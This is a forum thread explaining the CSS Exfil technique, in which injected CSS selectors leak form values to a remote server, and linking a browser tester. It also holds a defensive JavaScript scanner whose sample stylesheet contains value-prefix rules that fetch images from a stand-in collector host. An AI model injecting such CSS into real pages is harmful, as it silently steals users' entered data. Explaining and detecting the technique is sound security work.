CSS Exfil Vulnerability
#1
What is this CSS vulnerability again?
The CSS Exfil vulnerability detailed in this lengthy post is a method attackers can use to steal data from web pages using Cascading Style Sheets (CSS). CSS - one of the building blocks of the modern web - is used by developers to control the look-and-feel of a website and is present on nearly every modern page on the internet. By crafting targeted CSS selectors and injecting them into a web page, an attacker can trick the page into sending pieces of data to a remote server (e.g. usernames, passwords, and sensitive data such as date of birth, social security numbers, and credit card numbers).

How does this vulnerability tester page work?
This page attempts to load four remote images using CSS selectors which parse a hidden text field. If it is able to load any of those four images your browser is vulnerable to the CSS Exfil attack.

If the vulnerability doesn't involve JavaScript, why does the vulnerability tester require JavaScript?
While the CSS Exfil attack doesn't require JavaScript to function, this page requires a few lines of JavaScript to check to see if the exploit succeeded in loading the images.

CSS Exfil Vulnerability Tester
https://www.mike-gualtieri.com/css-exfil...ity-tester
Reply
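A defensive check for the selector pattern described in the post above, as an added example that is not part of the original thread or of the tester page: it scans a stylesheet for rules that pair a value-matching attribute selector with a cross-origin `url()`. The function name, the sample CSS and the `.invalid` hostnames are constructed for illustration.

```javascript
// Added example: flag CSS rules that pair a value-matching attribute selector
// with a cross-origin url(), the pattern the CSS Exfil technique relies on.
const VALUE_SELECTOR = /\[\s*value\s*[\^$*~|]?=/i;
const CSS_URL = /url\(\s*(['"]?)([^'")]+)\1\s*\)/gi;

function findExfilRules(cssText, pageOrigin) {
  const css = cssText.replace(/\/\*[\s\S]*?\*\//g, ''); // drop comments
  const findings = [];
  // Match "selector { declarations }"; rules nested in @media are matched too.
  for (const [, selector, body] of css.matchAll(/([^{}]+)\{([^{}]*)\}/g)) {
    if (!VALUE_SELECTOR.test(selector)) continue;
    const remote = [];
    for (const [, , raw] of body.matchAll(CSS_URL)) {
      let u;
      try { u = new URL(raw.trim(), pageOrigin); } catch { continue; }
      // Only network fetches to another origin can carry data off the page.
      if (/^https?:$/.test(u.protocol) && u.origin !== new URL(pageOrigin).origin) {
        remote.push(u.href);
      }
    }
    if (remote.length) findings.push({ selector: selector.trim(), urls: remote });
  }
  return findings;
}

// Constructed sample stylesheet (not taken from the tester page).
const SAMPLE_CSS = `
  /* benign: attribute selector that does not look at the value */
  input[type="text"] { border: 1px solid #ccc; }
  /* benign: value selector, but the image is same-origin */
  input[value=""] { background: url(/img/empty.png); }
  /* suspicious: value prefix match triggers a cross-origin request */
  #secret[value^="a"] { background-image: url("https://collector.example.invalid/a"); }
  @media screen {
    #secret[value$="z"] { list-style: url(//collector.example.invalid/z); }
  }
`;

console.log(findExfilRules(SAMPLE_CSS, 'https://forum.example.invalid'));
```

A same-origin or `data:` URL is not flagged, so the check stays quiet on ordinary form styling and only reports rules whose match result would be visible to a third-party server.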
#2
Is this a privacy issue, or a security issue?
Seems it can be used to track your online activities, but can't steal username and password on another website.
Reply

